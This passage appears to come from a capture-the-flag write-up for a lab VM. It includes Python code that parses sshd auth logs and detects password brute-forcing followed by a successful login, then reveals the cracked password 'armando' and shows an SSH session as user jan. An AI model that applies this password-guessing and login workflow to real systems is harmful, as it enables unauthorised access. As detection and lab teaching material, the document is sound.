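# One sshd auth.log line (Ubuntu 16.04 syslog layout): failed or accepted logins.
AUTH_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

# Constructed sample log: a burst of failures for one user from one source,
# two stray failures from another host, then a success from the first source
# about ten minutes later.
SAMPLE_AUTH_LOG = [
    f"Jan 14 07:21:{31 + i:02d} basic2 sshd[{4000 + i}]: Failed password for jan "
    f"from 192.168.56.1 port {51000 + i} ssh2"
    for i in range(12)
] + [
    "Jan 14 07:25:10 basic2 sshd[4100]: Failed password for invalid user admin from 10.0.0.5 port 40001 ssh2",
    "Jan 14 07:25:15 basic2 sshd[4101]: Failed password for invalid user admin from 10.0.0.5 port 40002 ssh2",
    "Jan 14 07:32:09 basic2 sshd[4200]: Accepted password for jan from 192.168.56.1 port 52000 ssh2",
]


def parse_auth_line(line, year=2020):
    """Return (timestamp, result, user, source_ip) or None for other lines.
    syslog omits the year, so the caller supplies it (assumed 2020 here)."""
    m = AUTH_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_ssh_bruteforce(lines, threshold=10, window_seconds=120):
    """Flag a source once it produces `threshold` failed logins inside a sliding
    window, keep counting afterwards, and note a later success from that
    source (the sign that a guessed password worked). Limits are assumptions."""
    recent = defaultdict(deque)   # ip -> failure timestamps inside the window
    users_seen = defaultdict(set)  # ip -> usernames it has tried
    alerts = {}                    # ip -> alert dict
    for line in lines:
        parsed = parse_auth_line(line)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        if result == "Failed":
            q = recent[ip]
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()
            users_seen[ip].add(user)
            if ip in alerts:
                alerts[ip]["failures"] += 1
            elif len(q) >= threshold:
                alerts[ip] = {"source": ip, "first_seen": q[0], "failures": len(q),
                              "users": users_seen[ip], "success_after": None}
        elif result == "Accepted" and ip in alerts:
            alerts[ip]["success_after"] = (ts, user)
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_ssh_bruteforce(SAMPLE_AUTH_LOG):
        print(f"{a['source']}: {a['failures']} failures from {a['first_seen']}, "
              f"users={sorted(a['users'])}, later success={a['success_after']}")
```

The "success after burst" field is the one worth paging on: a burst alone is background noise on any internet-facing SSH port, but a burst followed by an accepted password from the same source is an account to lock and a session to investigate. Rate limiting at the daemon (MaxAuthTries, or fail2ban on these same log lines) is the cheap mitigation; key-only authentication removes the guessing surface entirely.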
The password is : "armando"
$ ssh jan@192.168.56.103
jan@192.168.56.103's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Fri Nov 29 16:53:56 2019 from 192.168.56.1
jan@basic2:~$
For more writeups visit : http://www.sec-art.net/p/ctf.html